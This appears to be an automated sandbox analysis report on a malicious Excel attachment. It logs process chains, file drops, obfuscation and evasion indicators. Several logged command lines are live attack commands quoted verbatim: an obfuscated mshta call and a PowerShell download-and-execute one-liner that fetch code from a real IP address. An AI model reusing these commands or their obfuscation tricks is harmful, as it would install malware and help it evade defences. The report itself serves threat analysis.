Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031C67D DeleteService, 15_2_0031C67D
Yara signature match
Source: Attachment-2801.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\Attachment-2801.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Zefya\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: Attachment-2801.xls OLE indicator, VBA macros: true
Source: Attachment-2801.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@34/9@2/36
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Attachment-2801.xls OLE indicator, Workbook stream: true
Source: Attachment-2801.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: rundll32.exe, 00000015.00000002.671902573.0000000001DE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
Source: Attachment-2801.xls ReversingLabs: Detection: 25%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K......x.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................12k....................................}..v....p.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................12k..... ..............................}..v............0...............x.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................122k....................................}..v....@.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................122k....X.g.............................}..v............0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................22k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................22k......g.............................}..v............0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................*2k....E...............................}..v.....]......0...............X.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......+............................... .......................}..v............ ...............X.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe "1751206246-15647161101005220952792531086560418626-2088535704-1361078821873267499"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/oo/aa/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zefya\nybbbfj.sgf",zLEpZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zefya\nybbbfj.sgf",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wwjqkvceadqbdjp\jzkitex.drd",DvusKnlRvE
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wwjqkvceadqbdjp\jzkitex.drd",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xtqzugyhdvvax\ifxy.nbi",ULuJOPPBfclLAtS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xtqzugyhdvvax\ifxy.nbi",DllRegisterServer
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jgryagnlwd\cnso.vdd",fTwMfsDu
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jgryagnlwd\cnso.vdd",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iclyvfrvkfq\cpbsu.fzk",QAFiBTE
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iclyvfrvkfq\cpbsu.fzk",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/oo/aa/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zefya\nybbbfj.sgf",zLEpZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zefya\nybbbfj.sgf",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wwjqkvceadqbdjp\jzkitex.drd",DvusKnlRvE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wwjqkvceadqbdjp\jzkitex.drd",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xtqzugyhdvvax\ifxy.nbi",ULuJOPPBfclLAtS Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xtqzugyhdvvax\ifxy.nbi",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jgryagnlwd\cnso.vdd",fTwMfsDu Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jgryagnlwd\cnso.vdd",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iclyvfrvkfq\cpbsu.fzk",QAFiBTE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iclyvfrvkfq\cpbsu.fzk",DllRegisterServer
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDC5A.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbo source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBBa source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.672369890.0000000002C57000.00000004.00000020.00020000.00000000.sdmp
Source: 3F51.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Obfuscated command line found
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_03A600C4 push 8B490320h; iretd 4_3_03A600CA
Source: C:\Windows\System32\mshta.exe Code function: 4_3_03A608CE push 8B490320h; iretd 4_3_03A608D3
Source: C:\Windows\System32\mshta.exe Code function: 4_3_03A600C4 push 8B490320h; iretd 4_3_03A600CA
Source: C:\Windows\System32\mshta.exe Code function: 4_3_03A608CE push 8B490320h; iretd 4_3_03A608D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0025114C push ds; ret 9_2_0025114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002515F5 push cs; retf 9_2_002515FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0037114C push ds; ret 10_2_0037114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003715F5 push cs; retf 10_2_003715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0024114C push ds; ret 11_2_0024114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002415F5 push cs; retf 11_2_002415FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D114C push ds; ret 12_2_002D114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002D15F5 push cs; retf 12_2_002D15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0028114C push ds; ret 13_2_0028114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002815F5 push cs; retf 13_2_002815FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0031114C push ds; ret 15_2_0031114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003115F5 push cs; retf 15_2_003115FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002D114C push ds; ret 16_2_002D114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002D15F5 push cs; retf 16_2_002D15FE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8f55d should be: 0x89c39

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Zefya\nybbbfj.sgf (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Zefya\nybbbfj.sgf (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Zefya\nybbbfj.sgf:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wwjqkvceadqbdjp\jzkitex.drd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xtqzugyhdvvax\ifxy.nbi:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jgryagnlwd\cnso.vdd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Iclyvfrvkfq\cpbsu.fzk:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
